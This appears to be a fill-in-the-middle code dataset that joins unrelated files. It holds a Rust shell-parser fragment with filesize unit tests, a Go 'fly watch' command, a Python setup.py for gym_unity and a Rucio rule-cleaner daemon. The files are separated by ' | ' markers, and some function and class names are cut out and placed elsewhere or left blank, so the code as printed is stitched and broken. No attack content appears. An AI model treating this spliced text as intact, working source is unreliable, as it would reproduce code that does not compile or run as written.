let (orig_left, left) = working_exprs.pop().expect("This shouldn't be possible");
let (left, err) = shorthand_reparse(left, orig_left, scope, shorthand_mode);
if error.is_none() {
error = err;
}
(incoming_idx + idx, left, error)
}
/// Handles parsing the positional arguments as a batch
/// This allows us to check for times where multiple arguments are treated as one shape, as is the case with SyntaxShape::Math
fn parse_positional_argument(
idx: usize,
lite_cmd: &LiteCommand,
positional_type: &PositionalType,
remaining_positionals: usize,
scope: &dyn ParserScope,
) -> (usize, SpannedExpression, Option<ParseError>) {
let mut idx = idx;
let mut error = None;
let arg = match positional_type {
PositionalType::Mandatory(_, SyntaxShape::MathExpression)
| PositionalType::Optional(_, SyntaxShape::MathExpression) => {
let end_idx = if (lite_cmd.parts.len() - 1) > remaining_positionals {
lite_cmd.parts.len() - remaining_positionals
} else {
lite_cmd.parts.len()
};
let (new_idx, arg, err) =
parse_math_expression(idx, &lite_cmd.parts[idx..end_idx], scope, false);
let span = arg.span;
let mut commands = hir::Pipeline::new(span);
commands.push(ClassifiedCommand::Expr(Box::new(arg)));
let block = hir::Block::new(
Signature::new("<initializer>"),
vec![Group::new(vec![commands], lite_cmd.span())],
IndexMap::new(),
span,
);
let arg = SpannedExpression::new(Expression::Block(Arc::new(block)), span);
idx = new_idx - 1;
if error.is_none() {
error = err;
}
arg
}
PositionalType::Mandatory(_, SyntaxShape::RowCondition)
| PositionalType::Optional(_, SyntaxShape::RowCondition) => {
// A condition can take up multiple arguments, as we build the operation as <arg> <operator> <arg>
// We need to do this here because in parse_arg, we have access to only one arg at a time
if idx < lite_cmd.parts.len() {
if lite_cmd.parts[idx].item.starts_with('{') {
// It's an explicit math expression, so parse it deeper in
let (arg, err) =
parse_arg(SyntaxShape::RowCondition, scope, &lite_cmd.parts[idx]);
if error.is_none() {
error = err;
}
arg
} else {
let end_idx = if (lite_cmd.parts.len() - 1) > remaining_positionals {
lite_cmd.parts.len() - remaining_positionals
} else {
lite_cmd.parts.len()
};
let (new_idx, arg, err) =
parse_math_expression(idx, &lite_cmd.parts[idx..end_idx], scope, true);
let span = arg.span;
let mut commands = hir::Pipeline::new(span);
commands.push(ClassifiedCommand::Expr(Box::new(arg)));
let mut block = hir::Block::new(
Signature::new("<cond>"),
vec![Group::new(vec![commands], lite_cmd.span())],
IndexMap::new(),
span,
);
block.infer_params();
let arg = SpannedExpression::new(Expression::Block(Arc::new(block)), span);
idx = new_idx - 1;
if error.is_none() {
error = err;
}
arg
}
} else {
if error.is_none() {
error = Some(ParseError::argument_error(
lite_cmd.parts[0].clone(),
ArgumentError::MissingMandatoryPositional("condition".into()),
))
}
garbage(lite_cmd.span())
}
}
PositionalType::Mandatory(_, shape) | PositionalType::Optional(_, shape) => {
let (arg, err) = parse_arg(*shape, scope, &lite_cmd.parts[idx]);
if error.is_none() {
error = err;
}
arg
}
};
(idx, arg, error)
}
/// Does a full parse of an internal command using the lite-ly parse command as a starting point
/// This main focus at this level is to understand what flags were passed in, what positional arguments were passed in, what rest arguments were passed in
/// and to ensure that the basic requirements in terms of number of each were met.
fn parse_internal_command(
lite_cmd: &LiteCommand,
scope: &dyn ParserScope,
signature: &Signature,
mut idx: usize,
) -> (InternalCommand, Option<ParseError>) {
// This is a known internal command, so we need to work with the arguments and parse them according to the expected types
let (name, name_span) = (
lite_cmd.parts[0..(idx + 1)]
.iter()
.map(|x| x.item.clone())
.collect::<Vec<String>>()
.join(" "),
Span::new(
lite_cmd.parts[0].span.start(),
lite_cmd.parts[idx].span.end(),
),
);
let mut internal_command = InternalCommand::new(name, name_span, lite_cmd.span());
internal_command.args.set_initial_flags(signature);
let mut current_positional = 0;
let mut named = NamedArguments::new();
let mut positional = vec![];
let mut error = None;
idx += 1; // Start where the arguments begin
while idx < lite_cmd.parts.len() {
if lite_cmd.parts[idx].item.starts_with('-') && lite_cmd.parts[idx].item.len() > 1 {
let (named_types, err) = super::flag::get_flag_signature_spec(
signature,
&internal_command,
&lite_cmd.parts[idx],
);
if err.is_none() {
for (full_name, named_type) in &named_types {
match named_type {
NamedType::Mandatory(_, shape) | NamedType::Optional(_, shape) => {
if lite_cmd.parts[idx].item.contains('=') {
let mut offset = 0;
let value = lite_cmd.parts[idx]
.item
.chars()
.skip_while(|prop| {
offset += 1;
*prop != '='
})
.nth(1);
offset = if value.is_none() { offset - 1 } else { offset };
let flag_value = Span::new(
lite_cmd.parts[idx].span.start() + offset,
lite_cmd.parts[idx].span.end(),
);
let value = lite_cmd.parts[idx].item[offset..]
.to_string()
.spanned(flag_value);
let (arg, err) = parse_arg(*shape, scope, &value);
named.insert_mandatory(
full_name.clone(),
lite_cmd.parts[idx].span,
arg,
);
if error.is_none() {
error = err;
}
} else if idx == lite_cmd.parts.len() {
// Oops, we're missing the argument to our named argument
if error.is_none() {
error = Some(ParseError::argument_error(
lite_cmd.parts[0].clone(),
ArgumentError::MissingValueForName(format!("{:?}", shape)),
));
}
} else {
idx += 1;
if lite_cmd.parts.len() > idx {
let (arg, err) = parse_arg(*shape, scope, &lite_cmd.parts[idx]);
named.insert_mandatory(
full_name.clone(),
lite_cmd.parts[idx - 1].span,
arg,
);
if error.is_none() {
error = err;
}
} else if error.is_none() {
error = Some(ParseError::argument_error(
lite_cmd.parts[0].clone(),
ArgumentError::MissingValueForName(full_name.to_owned()),
));
}
}
}
NamedType::Switch(_) => {
named.insert_switch(
full_name.clone(),
Some(Flag::new(FlagKind::Longhand, lite_cmd.parts[idx].span)),
);
}
}
}
} else {
positional.push(garbage(lite_cmd.parts[idx].span));
if error.is_none() {
error = err;
}
}
} else if signature.positional.len() > current_positional {
let arg = {
let (new_idx, expr, err) = parse_positional_argument(
idx,
lite_cmd,
&signature.positional[current_positional].0,
signature.positional.len() - current_positional - 1,
scope,
);
idx = new_idx;
if error.is_none() {
error = err;
}
expr
};
positional.push(arg);
current_positional += 1;
} else if let Some((_, rest_type, _)) = &signature.rest_positional {
let (arg, err) = parse_arg(*rest_type, scope, &lite_cmd.parts[idx]);
if error.is_none() {
error = err;
}
positional.push(arg);
current_positional += 1;
} else {
positional.push(garbage(lite_cmd.parts[idx].span));
if error.is_none() {
error = Some(ParseError::argument_error(
lite_cmd.parts[0].clone(),
ArgumentError::UnexpectedArgument(lite_cmd.parts[idx].clone()),
));
}
}
idx += 1;
}
// Count the required positional arguments and ensure these have been met
let mut required_arg_count = 0;
for positional_arg in &signature.positional {
if let PositionalType::Mandatory(_, _) = positional_arg.0 {
required_arg_count += 1;
}
}
if positional.len() < required_arg_count && error.is_none() {
// to make "command -h" work even if required arguments are missing
if !named.named.contains_key("help") {
let (_, name) = &signature.positional[positional.len()];
error = Some(ParseError::argument_error(
lite_cmd.parts[0].clone(),
ArgumentError::MissingMandatoryPositional(name.to_owned()),
));
}
}
if !named.is_empty() {
internal_command.args.named = Some(named);
}
if !positional.is_empty() {
internal_command.args.positional = Some(positional);
}
(internal_command, error)
}
fn parse_external_call(
lite_cmd: &LiteCommand,
end_of_pipeline: bool,
scope: &dyn ParserScope,
) -> (Option<ClassifiedCommand>, Option<ParseError>) {
let mut error = None;
let name = lite_cmd.parts[0].clone().map(|v| {
let trimmed = trim_quotes(&v);
expand_path(trimmed).to_string_lossy().to_string()
});
let mut args = vec![];
let (name, err) = parse_arg(SyntaxShape::String, scope, &name);
let name_span = name.span;
if error.is_none() {
error = err;
}
args.push(name);
for lite_arg in &lite_cmd.parts[1..] {
let (expr, err) = parse_external_arg(lite_arg, scope);
if error.is_none() {
error = err;
}
args.push(expr);
}
(
Some(ClassifiedCommand::Internal(InternalCommand {
name: "run_external".to_string(),
name_span,
args: hir::Call {
head: Box::new(SpannedExpression {
expr: Expression::string("run_external".to_string()),
span: name_span,
}),
positional: Some(args),
named: None,
span: name_span,
external_redirection: if end_of_pipeline {
ExternalRedirection::None
} else {
ExternalRedirection::Stdout
},
},
})),
error,
)
}
fn parse_value_call(
call: LiteCommand,
scope: &dyn ParserScope,
) -> (Option<ClassifiedCommand>, Option<ParseError>) {
let mut err = None;
let (head, error) = parse_arg(SyntaxShape::Block, scope, &call.parts[0]);
let mut span = head.span;
if err.is_none() {
err = error;
}
let mut args = vec![];
for arg in call.parts.iter().skip(1) {
let (arg, error) = parse_arg(SyntaxShape::Any, scope, arg);
if err.is_none() {
err = error;
}
span = span.until(arg.span);
args.push(arg);
}
(
Some(ClassifiedCommand::Dynamic(hir::Call {
head: Box::new(head),
positional: Some(args),
named: None,
span,
external_redirection: ExternalRedirection::None,
})),
err,
)
}
fn expand_aliases_in_call(call: &mut LiteCommand, scope: &dyn ParserScope) {
if let Some(name) = call.parts.get(0) {
if let Some(mut expansion) = scope.get_alias(name) {
// set the expansion's spans to point to the alias itself
for item in expansion.iter_mut() {
item.span = name.span;
}
// replace the alias with the expansion
call.parts.remove(0);
expansion.append(&mut call.parts);
call.parts = expansion;
}
}
}
fn parse_call(
mut lite_cmd: LiteCommand,
end_of_pipeline: bool,
scope: &dyn ParserScope,
) -> (Option<ClassifiedCommand>, Option<ParseError>) {
expand_aliases_in_call(&mut lite_cmd, scope);
let mut error = None;
if lite_cmd.parts.is_empty() {
return (None, None);
} else if lite_cmd.parts[0].item.starts_with('^') {
let mut name = lite_cmd.parts[0]
.clone()
.map(|v| v.chars().skip(1).collect::<String>());
name.span = Span::new(name.span.start() + 1, name.span.end());
// TODO this is the same as the `else` branch below, only the name differs. Find a way
// to share this functionality.
let mut args = vec![];
let (name, err) = parse_arg(SyntaxShape::String, scope, &name);
let name_span = name.span;
if error.is_none() {
error = err;
}
args.push(name);
for lite_arg in &lite_cmd.parts[1..] {
let (expr, err) = parse_external_arg(lite_arg, scope);
if error.is_none() {
error = err;
}
args.push(expr);
}
return (
Some(ClassifiedCommand::Internal(InternalCommand {
name: "run_external".to_string(),
name_span,
args: hir::Call {
head: Box::new(SpannedExpression {
expr: Expression::string("run_external".to_string()),
span: name_span,
}),
positional: Some(args),
named: None,
span: name_span,
external_redirection: if end_of_pipeline {
ExternalRedirection::None
} else {
ExternalRedirection::Stdout
},
},
})),
error,
);
} else if lite_cmd.parts[0].item.starts_with('{') {
return parse_value_call(lite_cmd, scope);
} else if lite_cmd.parts[0].item.starts_with('$')
|| lite_cmd.parts[0].item.starts_with('\"')
|| lite_cmd.parts[0].item.starts_with('\'')
|| (lite_cmd.parts[0].item.starts_with('-')
&& parse_arg(SyntaxShape::Number, scope, &lite_cmd.parts[0])
.1
.is_none())
|| (lite_cmd.parts[0].item.starts_with('-')
&& parse_arg(SyntaxShape::Range, scope, &lite_cmd.parts[0])
.1
.is_none())
|| lite_cmd.parts[0].item.starts_with('0')
|| lite_cmd.parts[0].item.starts_with('1')
|| lite_cmd.parts[0].item.starts_with('2')
|| lite_cmd.parts[0].item.starts_with('3')
|| lite_cmd.parts[0].item.starts_with('4')
|| lite_cmd.parts[0].item.starts_with('5')
|| lite_cmd.parts[0].item.starts_with('6')
|| lite_cmd.parts[0].item.starts_with('7')
|| lite_cmd.parts[0].item.starts_with('8')
|| lite_cmd.parts[0].item.starts_with('9')
|| lite_cmd.parts[0].item.starts_with('[')
|| lite_cmd.parts[0].item.starts_with('(')
{
let (_, expr, err) = parse_math_expression(0, &lite_cmd.parts[..], scope, false);
error = error.or(err);
return (Some(ClassifiedCommand::Expr(Box::new(expr))), error);
} else if lite_cmd.parts.len() > 1 {
// FIXME: only build up valid subcommands instead of all arguments
// by checking each part to see if it's a valid identifier name
let mut parts: Vec<_> = lite_cmd.parts.clone().into_iter().map(|x| x.item).collect();
while parts.len() > 1 {
// Check if it's a sub-command
if let Some(signature) = scope.get_signature(&parts.join(" ")) {
let (mut internal_command, err) =
parse_internal_command(&lite_cmd, scope, &signature, parts.len() - 1);
error = error.or(err);
internal_command.args.external_redirection = if end_of_pipeline {
ExternalRedirection::None
} else {
ExternalRedirection::Stdout
};
return (Some(ClassifiedCommand::Internal(internal_command)), error);
}
parts.pop();
}
}
// Check if it's an internal command
if let Some(signature) = scope.get_signature(&lite_cmd.parts[0].item) {
if lite_cmd.parts[0].item == "def" {
let err = parse_definition(&lite_cmd, scope);
error = error.or(err);
}
let (mut internal_command, err) = parse_internal_command(&lite_cmd, scope, &signature, 0);
if internal_command.name == "source" {
let err = parse_source_internal(&lite_cmd, &internal_command, scope).err();
return (Some(ClassifiedCommand::Internal(internal_command)), err);
} else if lite_cmd.parts[0].item == "alias" || lite_cmd.parts[0].item == "unalias" {
let error = parse_alias(&lite_cmd, scope);
if error.is_none() {
return (Some(ClassifiedCommand::Internal(internal_command)), None);
} else {
return (Some(ClassifiedCommand::Internal(internal_command)), error);
}
}
error = error.or(err);
internal_command.args.external_redirection = if end_of_pipeline {
ExternalRedirection::None
} else {
ExternalRedirection::Stdout
};
(Some(ClassifiedCommand::Internal(internal_command)), error)
} else {
parse_external_call(&lite_cmd, end_of_pipeline, scope)
}
}
/// Convert a lite-ly parsed pipeline into a fully classified pipeline, ready to be evaluated.
/// This conversion does error-recovery, so the result is allowed to be lossy. A lossy unit is designated as garbage.
/// Errors are returned as part of a side-car error rather than a Result to allow both error and lossy result simultaneously.
fn parse_pipeline(
lite_pipeline: LitePipeline,
scope: &dyn ParserScope,
) -> (Pipeline, Option<ParseError>) {
let mut commands = Pipeline::new(lite_pipeline.span());
let mut error = None;
let pipeline_len = lite_pipeline.commands.len();
let iter = lite_pipeline.commands.into_iter().peekable();
for lite_cmd in iter.enumerate() {
let (call, err) = parse_call(lite_cmd.1, lite_cmd.0 == (pipeline_len - 1), scope);
if error.is_none() {
error = err;
}
if let Some(call) = call {
if call.has_var_usage("$in") && lite_cmd.0 > 0 {
let call = wrap_with_collect(call, "$in");
commands.push(call);
} else {
commands.push(call);
}
}
}
(commands, error)
}
type SpannedKeyValue = (Spanned<String>, Spanned<String>);
fn wrap_with_collect(call: ClassifiedCommand, var_name: &str) -> ClassifiedCommand {
let mut block = Block::basic();
block.block.push(Group {
pipelines: vec![Pipeline {
list: vec![call],
span: Span::unknown(),
}],
span: Span::unknown(),
});
block.params.positional = vec![(
PositionalType::Mandatory(var_name.into(), SyntaxShape::Any),
format!("implied {}", var_name),
)];
ClassifiedCommand::Internal(InternalCommand {
name: "collect".into(),
name_span: Span::unknown(),
args: Call {
head: Box::new(SpannedExpression {
expr: Expression::Synthetic(Synthetic::String("collect".into())),
span: Span::unknown(),
}),
positional: Some(vec![SpannedExpression {
expr: Expression::Block(Arc::new(block)),
span: Span::unknown(),
}]),
named: None,
span: Span::unknown(),
external_redirection: ExternalRedirection::Stdout,
},
})
}
fn expand_shorthand_forms(
lite_pipeline: &LitePipeline,
) -> (LitePipeline, Option<SpannedKeyValue>, Option<ParseError>) {
if !lite_pipeline.commands.is_empty() {
if lite_pipeline.commands[0].parts[0].contains('=')
&& !lite_pipeline.commands[0].parts[0].starts_with('$')
{
let assignment: Vec<_> = lite_pipeline.commands[0].parts[0].splitn(2, '=').collect();
if assignment.len() != 2 {
(
lite_pipeline.clone(),
None,
Some(ParseError::mismatch(
"environment variable assignment",
lite_pipeline.commands[0].parts[0].clone(),
)),
)
} else {
let original_span = lite_pipeline.commands[0].parts[0].span;
let env_value = trim_quotes(assignment[1]);
let (variable_name, value) = (assignment[0], env_value);
let mut lite_pipeline = lite_pipeline.clone();
if !lite_pipeline.commands[0].parts.len() > 1 {
let mut new_lite_command_parts = lite_pipeline.commands[0].parts.clone();
new_lite_command_parts.remove(0);
lite_pipeline.commands[0].parts = new_lite_command_parts;
(
lite_pipeline,
Some((
variable_name.to_string().spanned(original_span),
value.spanned(original_span),
)),
None,
)
} else {
(
lite_pipeline.clone(),
None,
Some(ParseError::mismatch(
"a command following variable",
lite_pipeline.commands[0].parts[0].clone(),
)),
)
}
}
} else {
(lite_pipeline.clone(), None, None)
}
} else {
(lite_pipeline.clone(), None, None)
}
}
fn parse_alias(call: &LiteCommand, scope: &dyn ParserScope) -> Option<ParseError> {
if call.parts[0].item == "alias" {
if (call.parts.len() == 1)
|| (call.parts.len() == 2
&& (call.parts[1].item == "--help" || (call.parts[1].item == "-h")))
{
return None;
}
if call.parts.len() < 4 {
return Some(ParseError::mismatch("alias", call.parts[0].clone()));
}
if call.parts[0].item != "alias" {
return Some(ParseError::mismatch("alias", call.parts[0].clone()));
}
if call.parts[2].item != "=" {
return Some(ParseError::mismatch("=", call.parts[2].clone()));
}
} else {
// unalias
if call.parts.len() != 2 {
return Some(ParseError::mismatch("unalias", call.parts[0].clone()));
}
}
let name = call.parts[1].item.clone();
let args: Vec<_> = call.parts.iter().skip(3).cloned().collect();
match call.parts[0].item.as_str() {
"alias" => scope.add_alias(&name, args),
"unalias" => {
scope.remove_alias(&name);
}
_ => unreachable!(),
};
None
}
pub fn classify_block(
lite_block: &LiteBlock,
scope: &dyn ParserScope,
) -> (Arc<Block>, Option<ParseError>) {
let mut output = Block::basic();
let mut error = None;
// Check for custom commands first
for group in lite_block.block.iter() {
for pipeline in &group.pipelines {
for call in &pipeline.commands {
if let Some(first) = call.parts.first() {
if first.item == "def" {
if pipeline.commands.len() > 1 && error.is_none() {
error = Some(ParseError::mismatch("definition", first.clone()));
}
parse_definition_prototype(call, scope);
}
}
}
}
}
// Then the rest of the code
for group in &lite_block.block {
let mut out_group = Group::basic();
for pipeline in &group.pipelines {
let mut env_vars = vec![];
let mut pipeline = pipeline.clone();
loop {
if pipeline.commands.is_empty() || pipeline.commands[0].parts.is_empty() {
break;
}
let (pl, vars, err) = expand_shorthand_forms(&pipeline);
if error.is_none() {
error = err;
}
pipeline = pl;
if let Some(vars) = vars {
env_vars.push(vars);
} else {
break;
}
}
let pipeline_span = pipeline.span();
let (mut out_pipe, err) = parse_pipeline(pipeline, scope);
if error.is_none() {
error = err;
}
while let Some(vars) = env_vars.pop() {
let span = pipeline_span;
let block = hir::Block::new(
Signature::new("<block>"),
vec![Group::new(vec![out_pipe.clone()], span)],
IndexMap::new(),
span,
);
let mut call = hir::Call::new(
Box::new(SpannedExpression {
expr: Expression::string("with-env".to_string()),
span,
}),
span,
);
call.positional = Some(vec![
SpannedExpression {
expr: Expression::List(vec![
SpannedExpression {
expr: Expression::string(vars.0.item),
span: vars.0.span,
},
SpannedExpression {
expr: Expression::string(vars.1.item),
span: vars.1.span,
},
]),
span: Span::new(vars.0.span.start(), vars.1.span.end()),
},
SpannedExpression {
expr: Expression::Block(Arc::new(block)),
span,
},
]);
let classified_with_env = ClassifiedCommand::Internal(InternalCommand {
name: "with-env".to_string(),
name_span: Span::unknown(),
args: call,
});
out_pipe = Pipeline {
list: vec![classified_with_env],
span,
};
}
if !out_pipe.list.is_empty() {
out_group.push(out_pipe);
}
}
if !out_group.pipelines.is_empty() {
output.push(out_group);
}
}
let definitions = scope.get_definitions();
for definition in definitions.into_iter() {
let name = definition.params.name.clone();
if !output.definitions.contains_key(&name) {
output.definitions.insert(name, definition.clone());
}
}
output.infer_params();
(Arc::new(output), error)
}
pub fn parse(
input: &str,
span_offset: usize,
scope: &dyn ParserScope,
) -> (Arc<Block>, Option<ParseError>) {
let mut error = None;
let (output, err) = lex(input, span_offset, NewlineMode::Normal);
if error.is_none() {
error = err;
}
let (lite_block, err) = parse_block(output);
if error.is_none() {
error = err;
}
let (block, err) = classify_block(&lite_block, scope);
if error.is_none() {
error = err;
}
(block, error)
}
#[test]
fn unit_parse_byte_units() {
struct TestCase {
string: String,
value: i64,
unit: Unit,
}
let cases = [
TestCase {
string: String::from("108b"),
value: 108,
unit: Unit::Byte,
},
TestCase {
string: String::from("0B"),
value: 0,
unit: Unit::Byte,
},
TestCase {
string: String::from("10kb"),
value: 10,
unit: Unit::Kilobyte,
},
TestCase {
string: String::from("16KB"),
value: 16,
unit: Unit::Kilobyte,
},
TestCase {
string: String::from("99kB"),
value: 99,
unit: Unit::Kilobyte,
},
TestCase {
string: String::from("27Kb"),
value: 27,
unit: Unit::Kilobyte,
},
TestCase {
string: String::from("11Mb"),
value: 11,
unit: Unit::Megabyte,
},
TestCase {
string: String::from("27mB"),
value: 27,
unit: Unit::Megabyte,
},
TestCase {
string: String::from("811Gb"),
value: 811,
unit: Unit::Gigabyte,
},
TestCase {
string: String::from("27gB"),
value: 27,
unit: Unit::Gigabyte,
},
TestCase {
string: String::from("11Tb"),
value: 11,
unit: Unit::Terabyte,
},
TestCase {
string: String::from("1027tB"),
value: 1027,
unit: Unit::Terabyte,
},
TestCase {
string: String::from("11Pb"),
value: 11,
unit: Unit::Petabyte,
},
TestCase {
string: String::from("27pB"),
value: 27,
unit: Unit::Petabyte,
},
TestCase {
string: String::from("10kib"),
value: 10,
unit: Unit::Kibibyte,
},
TestCase {
string: String::from("123KiB"),
value: 123,
unit: Unit::Kibibyte,
},
TestCase {
string: String::from("24kiB"),
value: 24,
unit: Unit::Kibibyte,
},
TestCase {
string: String::from("10mib"),
value: 10,
unit: Unit::Mebibyte,
},
TestCase {
string: String::from("123MiB"),
value: 123,
unit: Unit::Mebibyte,
},
TestCase {
string: String::from("10gib"),
value: 10,
unit: Unit::Gibibyte,
},
TestCase {
string: String::from("123GiB"),
value: 123,
unit: Unit::Gibibyte,
},
TestCase {
string: String::from("10tib"),
value: 10,
unit: Unit::Tebibyte,
},
TestCase {
string: String::from("123TiB"),
value: 123,
unit: Unit::Tebibyte,
},
TestCase {
string: String::from("10pib"),
value: 10,
unit: Unit::Pebibyte,
},
TestCase {
string: String::from("123PiB"),
value: 123,
unit: Unit::Pebibyte,
},
];
for case in cases.iter() {
let input_len = case.string.len();
let value_len = case.value.to_string().len();
let input = case.string.clone().spanned(Span::new(0, input_len));
let result = parse_filesize(&input);
assert_eq!(result.1, None);
assert_eq!(
result.0.expr,
Expression::unit(
Spanned {
span: Span::new(0, value_len),
item: case.value
},
Spanned {
span: Span::new(value_len, input_len),
item: case.unit
}
)
);
}
}
#[test]
fn unit_parse_byte_units_decimal() {
struct TestCase {
string: String,
value: i64,
value_str: String,
unit: Unit,
}
let cases = [
TestCase {
string: String::from("0.25KB"),
value: 250,
value_str: String::from("0.25"),
unit: Unit::Byte,
},
TestCase {
string: String::from("2.5Mb"),
value: 2500,
value_str: String::from("2.5"),
unit: Unit::Kilobyte,
},
TestCase {
string: String::from("0.5Gb"),
value: 500,
value_str: String::from("0.5"),
unit: Unit::Megabyte,
},
TestCase {
string: String::from("811.5Gb"),
value: 811500,
value_str: String::from("811.5"),
unit: Unit::Megabyte,
},
TestCase {
string: String::from("11.5Tb"),
value: 11500,
value_str: String::from("11.5"),
unit: Unit::Gigabyte,
},
TestCase {
string: String::from("12.5Pb"),
value: 12500,
value_str: String::from("12.5"),
unit: Unit::Terabyte,
},
TestCase {
string: String::from("10.5kib"),
value: 10752,
value_str: String::from("10.5"),
unit: Unit::Byte,
},
TestCase {
string: String::from("0.5mib"),
value: 512,
value_str: String::from("0.5"),
unit: Unit::Kibibyte,
},
TestCase {
string: String::from("3.25gib"),
value: 3328,
value_str: String::from("3.25"),
unit: Unit::Mebibyte,
},
];
for case in cases.iter() {
let input_len = case.string.len();
let value_len = case.value_str.to_string().len();
let input = case.string.clone().spanned(Span::new(0, input_len));
let result = parse_filesize(&input);
assert_eq!(result.1, None);
assert_eq!(
result.0.expr,
Expression::unit(
Spanned {
span: Span::new(0, value_len),
item: case.value
},
Spanned {
span: Span::new(value_len, input_len),
item: case.unit
}
)
);
}
}
| format |
watch.go | package commands
import (
"fmt"
"os"
"strconv"
"github.com/concourse/fly/commands/internal/flaghelpers"
"github.com/concourse/fly/eventstream"
"github.com/concourse/fly/rc"
)
type WatchCommand struct {
Job flaghelpers.JobFlag `short:"j" long:"job" value-name:"PIPELINE/JOB" description:"Watches builds of the given job"`
Build string `short:"b" long:"build" description:"Watches a specific build"`
}
func (command *WatchCommand) Execute(args []string) error {
target, err := rc.LoadTarget(Fly.Target, Fly.Verbose)
if err != nil {
return err
}
err = target.Validate()
if err != nil {
return err
}
var buildId int
client := target.Client()
if command.Job.JobName != "" || command.Build == "" {
build, err := GetBuild(client, target.Team(), command.Job.JobName, command.Build, command.Job.PipelineName)
if err != nil {
return err
}
buildId = build.ID
} else if command.Build != "" {
buildId, err = strconv.Atoi(command.Build)
if err != nil {
return err
}
}
eventSource, err := client.BuildEvents(fmt.Sprintf("%d", buildId))
if err != nil |
exitCode := eventstream.Render(os.Stdout, eventSource)
eventSource.Close()
os.Exit(exitCode)
return nil
}
| {
return err
} |
setup.py | #!/usr/bin/env python
import os
import sys
from setuptools import setup, find_packages
from setuptools.command.install import install
VERSION = "0.11.0"
class | (install):
"""
Custom command to verify that the git tag matches our version
See https://circleci.com/blog/continuously-deploying-python-packages-to-pypi-with-circleci/
"""
description = "verify that the git tag matches our version"
def run(self):
tag = os.getenv("CIRCLE_TAG")
if tag != VERSION:
info = "Git tag: {0} does not match the version of this app: {1}".format(
tag, VERSION
)
sys.exit(info)
setup(
name="gym_unity",
version=VERSION,
description="Unity Machine Learning Agents Gym Interface",
license="Apache License 2.0",
author="Unity Technologies",
author_email="[email protected]",
url="https://github.com/Unity-Technologies/ml-agents",
packages=find_packages(),
install_requires=["gym", "mlagents_envs=={}".format(VERSION)],
cmdclass={"verify": VerifyVersionCommand},
)
| VerifyVersionCommand |
cleaner.py | # Copyright 2013-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <[email protected]>, 2013-2016
# - Mario Lassnig <[email protected]>, 2013-2015
# - Cedric Serfon <[email protected]>, 2013
# - Vincent Garonne <[email protected]>, 2014-2018
"""
Judge-Cleaner is a daemon to clean expired replication rules.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from copy import deepcopy
from datetime import datetime, timedelta
from re import match
from random import randint
from sqlalchemy.exc import DatabaseError
from rucio.common.config import config_get
from rucio.common.exception import DatabaseException, UnsupportedOperation, RuleNotFound
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.rule import delete_rule, get_expired_rules
from rucio.core.monitor import record_counter
from rucio.db.sqla.util import get_db_time
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def rule_cleaner(once=False):
"""
Main loop to check for expired replication rules
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_rules = {} # {rule_id: datetime}
# Make an initial heartbeat so that all judge-cleaners have the correct worker number on the next try
live(executable='rucio-judge-cleaner', hostname=hostname, pid=pid, thread=current_thread)
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable='rucio-judge-cleaner', hostname=hostname, pid=pid, thread=current_thread)
start = time.time()
# Refresh paused rules
iter_paused_rules = deepcopy(paused_rules)
for key in iter_paused_rules:
if datetime.utcnow() > paused_rules[key]:
del paused_rules[key]
rules = get_expired_rules(total_workers=heartbeat['nr_threads'] - 1,
worker_number=heartbeat['assign_thread'],
limit=200,
blacklisted_rules=[key for key in paused_rules])
logging.debug('rule_cleaner[%s/%s] index query time %f fetch size is %d' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, time.time() - start, len(rules)))
if not rules and not once:
logging.debug('rule_cleaner[%s/%s] did not get any work (paused_rules=%s)' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, str(len(paused_rules))))
graceful_stop.wait(60)
else:
for rule in rules:
rule_id = rule[0]
rule_expression = rule[1]
logging.info('rule_cleaner[%s/%s]: Deleting rule %s with expression %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id, rule_expression))
if graceful_stop.is_set():
break
try:
start = time.time()
delete_rule(rule_id=rule_id, nowait=True)
logging.debug('rule_cleaner[%s/%s]: deletion of %s took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id, time.time() - start))
except (DatabaseException, DatabaseError, UnsupportedOperation), e:
if match('.*ORA-00054.*', str(e.args[0])):
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(600, 2400))
record_counter('rule.judge.exceptions.LocksDetected')
logging.warning('rule_cleaner[%s/%s]: Locks detected for %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id))
elif match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.error(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except RuleNotFound, e:
pass
except (DatabaseException, DatabaseError), e:
if match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception, e:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable='rucio-judge-cleaner', hostname=hostname, pid=pid, thread=current_thread)
def | (signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
Starts up the Judge-Clean threads.
"""
